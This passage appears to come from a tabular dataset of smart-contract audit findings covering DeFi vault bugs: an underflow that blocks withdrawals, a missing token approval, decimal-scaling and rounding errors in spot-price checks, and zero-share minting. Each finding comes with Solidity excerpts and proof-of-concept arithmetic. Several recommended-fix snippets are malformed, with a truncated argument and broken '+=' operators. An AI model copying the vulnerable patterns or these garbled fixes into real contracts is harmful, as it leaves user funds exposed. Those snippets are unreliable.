amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n" +PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error,medium,"PerpDepository.netAssetDeposits variable can prevent users from withdrawing with an underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when a user deposits X assets, he receives Y UXD tokens. And when he later redeems his Y UXD tokens he can receive more or less than X assets. This can lead to a situation when the netAssetDeposits variable would be set to a negative value, which will revert the tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As a result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeems his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, the transaction will revert inside `_withdrawAsset` function with an underflow error.","As you don't use this variable anywhere else, you can remove it. 
Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.",User can't redeem all his UXD tokens.,"```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n" +ERC5095 has not approved MarketPlace to spend tokens in ERC5095,medium,"ERC5095 requires approving MarketPlace to spend the tokens in ERC5095 before calling MarketPlace.sellUnderlying/sellPrincipalToken\\nMarketPlace.sellUnderlying/sellPrincipalToken will call transferFrom to send tokens from msg.sender to pool, which requires msg.sender to approve MarketPlace. However, before calling MarketPlace.sellUnderlying/sellPrincipalToken in ERC5095, there is no approval for MarketPlace to spend the tokens in ERC5095, which causes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.\\n```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n 
revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n\\nIn the test file, `vm.startPrank(address(token))` is used and approves the MarketPlace, which cannot be done in the mainnet\\n```\\n vm.startPrank(address(token));\\n IERC20(Contracts.USDC).approve(address(marketplace), type(uint256).max);\\n IERC20(Contracts.YIELD_TOKEN).approve(\\n address(marketplace),\\n type(uint256).max\\n );\\n```\\n","Approve MarketPlace to spend tokens in ERC5095 in ERC5095.setPool.\\n```\\n function setPool(address p)\\n external\\n authorized(marketplace)\\n returns (bool)\\n {\\n pool = p.fyToken();\\n// Add the line below\\n Safe.approve(IERC20(underlying), marketplace, type(uint256).max);\\n// Add the line below\\n Safe.approve(IERC20(p.), marketplace, type(uint256).max);\\n\\n return true;\\n }\\n\\n pool = address(0);\\n }\\n```\\n","It makes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. 
users cannot sell tokens through ERC5095.","```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n" +Two token vault will be broken if it comprises tokens with different decimals,high,"A two token vault that comprises tokens with different decimals will have many of its key functions broken. 
For instance, rewards cannot be reinvested and vault cannot be settled.\\nThe `Stable2TokenOracleMath._getSpotPrice` function is used to compute the spot price of two tokens.\\n```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nTwo tokens (USDC and DAI) with different decimals will be used below to illustrate the 
issue:\\nUSDC/DAI Spot Price\\nAssume that the primary token is DAI (18 decimals) and the secondary token is USDC (6 decimals). As such, the scaling factors would be as follows. The token rate is ignored and set to 1 for simplicity.\\nPrimary Token (DAI)'s scaling factor = 1e18\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e0) * token rate (1)\\nscaling factor = 1e18`\\nSecondary Token (USDC)'s scaling factor = 1e30\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e12) * token rate (1)\\nscaling factor = 1e18 * 1e12 = 1e30`\\nAssume that the `primaryBalance` is 100 DAI (100e18), and the `secondaryBalance` is 100 USDC (100e6). Line 25 - 28 of the `_getSpotPrice` function will normalize the tokens balances to 18 decimals as follows:\\n`scaledPrimaryBalance` will be 100e18 (It remains the same as no scaling is needed because DAI is already denominated in 18 decimals)\\n`scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledPrimaryBalance` = 100e18 * 1e18 / 1e18\\n`scaledPrimaryBalance` = 100e18`\\n`scaledSecondaryBalance` will upscale to 100e18\\n`scaledSecondaryBalance` = `scaledSecondaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledSecondaryBalance` = 100e6 * 1e30 / 1e18\\n`scaledSecondaryBalance` = 100e18\\nThe `StableMath._calcSpotPrice` function at Line 39 returns the spot price of Y/X. In this example, `balanceX` is DAI, and `balanceY` is USDC. Thus, the spot price will be USDC/DAI. This means the amount of USDC I will get for each DAI.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in `1e18`. With both the primary and secondary balances normalized to 18 decimals, they can be safely passed to the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions to compute the spot price. 
Assuming that the price of USDC and DAI is perfectly symmetric (1 DAI can be exchanged for exactly 1 USDC, and vice versa), the spot price returned from the `StableMath._calcSpotPrice` will be `1e18`. Note that the spot price returned by the `StableMath._calcSpotPrice` function will be denominated in 18 decimals.\\nIn Line 47-50 within the `Stable2TokenOracleMath._getSpotPrice` function, it attempts to downscale the spot price to normalize it back to the original decimals and token rate (e.g. stETH back to wstETH) of the token.\\nThe `scaleFactor` at Line 47 will be evaluated as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e30 * 1e18 / 1e18\\nscaleFactor = 1e30\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e6` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e30\\nspotPrice = 1e6\\n```\\n\\nDAI/USDC Spot Price\\nIf it is the opposite where the primary token is USDC (6 decimals) and the secondary token is DAI (18 decimals), the calculation of the spot price will be as follows:\\nThe `scaleFactor` at Line 47 will be evaluated to as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e18 * 1e18 / 1e30\\nscaleFactor = 1e6\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e30` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e6\\nspotPrice = 1e30\\n```\\n\\nNote about the spot price\\nAssuming that the spot price of USDC and DAI is 1:1. As shown above, if the decimals of two tokens are not the same, the final spot price will end up either 1e6 (USDC/DAI) or 1e30 (DAI/USDC). 
However, if the decimals of two tokens (e.g. wstETH and WETH) are the same, this issue stays hidden as the `scaleFactor` in Line 47 will always be 1e18 as both `secondaryScaleFactor` and `primaryScaleFactor` cancel out each other.\\nIt was observed that the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is being compared with the oracle price from the `TwoTokenPoolUtils._getOraclePairPrice` function to determine if the pool has been manipulated within many functions.\\n```\\nuint256 oraclePrice = poolContext._getOraclePairPrice(strategyContext.tradingModule);\\n```\\n\\nBased on the implementation of the `TwoTokenPoolUtils._getOraclePairPrice` function , the `oraclePrice` returned by this function is always denominated in 18 decimals regardless of the decimals of the underlying tokens. For instance, assume the spot price of USDC (6 decimals) and DAI (18 decimals) is 1:1. The spot price returned by this oracle function for USDC/DAI will be `1e18` and DAI/USDC will be `1e18`.\\nIn many functions, the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is compared with the oracle price via the `Stable2TokenOracleMath._checkPriceLimit`. Following is one such example. The `oraclePrice` will be `1e18`, while the `spotPrice` will be either `1e6` or `1e30` in our example. 
This will cause the `_checkPriceLimit` to always revert because of the large discrepancy between the two prices.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getMinExitAmounts(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 oraclePrice,\\n uint256 bptAmount\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n // Validate the spot price to make sure the pool is not being manipulated\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n```\\n\\nOther affected functions include the following:\\nStable2TokenOracleMath._validateSpotPriceAndPairPrice\\nStable2TokenOracleMath._getTimeWeightedPrimaryBalance","Issue Two token vault will be broken if it comprises tokens with different decimals\\nWithin the `Stable2TokenOracleMath._getSpotPrice`, normalize the spot price back to 1e18 before returning the result. This ensures that it can be compared with the oracle price, which is denominated in 1e18 precision.\\nThis has been implemented in the spot price function (Boosted3TokenPoolUtils._getSpotPriceWithInvariant) of another pool (Boosted3Token). However, it was not consistently applied in `TwoTokenPool`.","A vault supporting tokens with two different decimals will have many of its key functions will be broken as the `_checkPriceLimit` will always revert. For instance, rewards cannot be reinvested and vaults cannot be settled since they rely on the `_checkPriceLimit` function.\\nIf the reward cannot be reinvested, the strategy tokens held by the users will not appreciate. 
If the vault cannot be settled, the vault debt cannot be repaid to Notional and the gain cannot be realized. Loss of assets for both users and Notional","```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n" +Rounding differences when computing the invariant,high,"The invariant used within Boosted3Token vault to compute 
the spot price is not aligned with the Balancer's ComposableBoostedPool due to rounding differences. The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). In the worst-case scenario, it might potentially fail to detect the pool has been manipulated as the spot price computed might be inaccurate.\\nThe Boosted3Token leverage vault relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n 
Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `Boosted3TokenPoolUtils._getSpotPrice` and `Boosted3TokenPoolUtils._getValidatedPoolData` functions, the `StableMath._calculateInvariant` is computed rounding up.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getSpotPrice(\\n ThreeTokenPoolContext memory poolContext, \\n BoostedOracleContext memory oracleContext,\\n uint8 tokenIndex\\n ) internal pure returns (uint256 spotPrice) {\\n..SNIP..\\n uint256[] memory balances = _getScaledBalances(poolContext);\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getValidatedPoolData(\\n ThreeTokenPoolContext memory poolContext,\\n BoostedOracleContext memory oracleContext,\\n StrategyContext memory strategyContext\\n ) internal view returns (uint256 virtualSupply, uint256[] memory balances, uint256 invariant) {\\n (virtualSupply, balances) =\\n _getVirtualSupplyAndBalances(poolContext, oracleContext);\\n\\n // Get the current and new invariants. 
Since we need a bigger new invariant, we round the current one up.\\n invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\nHowever, Balancer has since migrated its Boosted3Token pool from the legacy BoostedPool structure to a new ComposableBoostedPool contract.\\nThe new ComposableBoostedPool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down.\\n```\\n function _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n\\n uint256 sum = 0; // S in the Curve version\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n ..SNIP..\\n```\\n\\nThus, Notional round up when calculating the invariant while Balancer's ComposableBoostedPool round down when calculating the invariant. This inconsistency will result in a different invariant","To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's ComposableBoostedPool and Notional's Boosted3Token leverage vault are aligned, and the implementation of the StableMath functions is the same between them.","The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). 
If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated and the trade proceeds to execute against the manipulated pool leading to a loss of assets.","```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > 
prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n" +Users deposit assets to the vault but receives no strategy token in return,high,"Due to a rounding error in Solidity, it is possible that a user deposits assets to the vault, but receives no strategy token in return due to issues in the following functions:\\nStrategyUtils._convertBPTClaimToStrategyTokens\\nBoosted3TokenPoolUtils._deposit\\nTwoTokenPoolUtils._deposit\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertBPTClaimToStrategyTokens` function, it was observed that the numerator precision (1e8) is much smaller than the denominator precision (1e18).\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.vaultState.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. 
Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\n }\\n```\\n\\nAs a result, the `StrategyUtils._convertBPTClaimToStrategyTokens` function might return zero strategy tokens under the following two conditions:\\nIf the `totalBPTHeld` is zero (First Deposit)\\nIf the `totalBPTHeld` is zero, the code at Line 31 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / BalancerConstants.BALANCER_PRECISION;\\nstrategyTokenAmount = (bptClaim * 1e8) / 1e18\\nstrategyTokenAmount = ((10 ** 10 - 1) * 1e8) / 1e18 = 0\\n```\\n\\nDuring the first deposit, if the user deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero.\\nIf the `totalBPTHeld` is larger than zero (Subsequently Deposits)\\nIf the `totalBPTHeld` is larger than zero, the code at Line 38 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (x * 1e8))/ (y * 1e18)\\n```\\n\\nIf the numerator is less than the denominator, the `strategyTokenAmount` will be zero.\\nTherefore, it is possible that the users deposited their minted BPT to the vault, but received zero strategy tokens in return.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext 
memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n ) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n\\n strategyContext.vaultState.totalBPTHeld += bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal += strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nProof-of-Concept\\nAssume that Alice is the first depositor, and she forwarded 10000 BPT. During the first mint, the strategy token will be minted in a 1:1 ratio. Therefore, Alice will receive 10000 strategy tokens in return. At this point in time, `totalStrategyTokenGlobal` = 10000 strategy tokens and `totalBPTHeld` is 10000 BPT.\\nWhen Bob deposits to the vault after Alice, he will be subjected to the following formula:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (10000 * 1e8))/ (10000 * 1e18)\\nstrategyTokenAmount = (bptClaim * (1e12))/ (1e22)\\n```\\n\\nIf Bob deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero. Bob will receive no strategy token in return for his BPT.\\nAnother side effect of this issue is that if Alice withdraws all her strategy tokens, she will get back all her 10000 BPT plus the BPT that Bob deposited earlier.","Consider reverting if zero strategy token is minted. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. 
Solmate)\\n```\\nfunction _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n// Add the line below\\n require(strategyTokensMinted != 0, ""zero strategy token minted""); \\n\\n strategyContext.vaultState.totalBPTHeld // Add the line below\\n= bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal // Add the line below\\n= strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n",Loss of assets for the users as they deposited their assets but receive zero strategy tokens in return.,```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n +Vault's `totalStrategyTokenGlobal` will not be in sync,high,"The `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault.\\nThis affects both the TwoToken and Boosted3Token vaults\\nThe `StrategyUtils._convertStrategyTokensToBPTClaim` function might return zero if a small number of `strategyTokenAmount` is passed into the function. 
If `(strategyTokenAmount * context.vaultState.totalBPTHeld)` is smaller than `context.vaultState.totalStrategyTokenGlobal`, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nIn Line 441 of the `Boosted3TokenPoolUtils._redeem` function below, if `bptClaim` is zero, it will return zero and exit the function immediately.\\nIf a small number of `strategyTokens` is passed into the `_redeem` function and the `bptClaim` ends up as zero, the caller of the `_redeem` function will assume that all the `strategyTokens` have been redeemed.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nThe following function shows an example of the caller of the `_redeem` function at Line 171 below accepting the zero value as it does not revert when the zero value is 
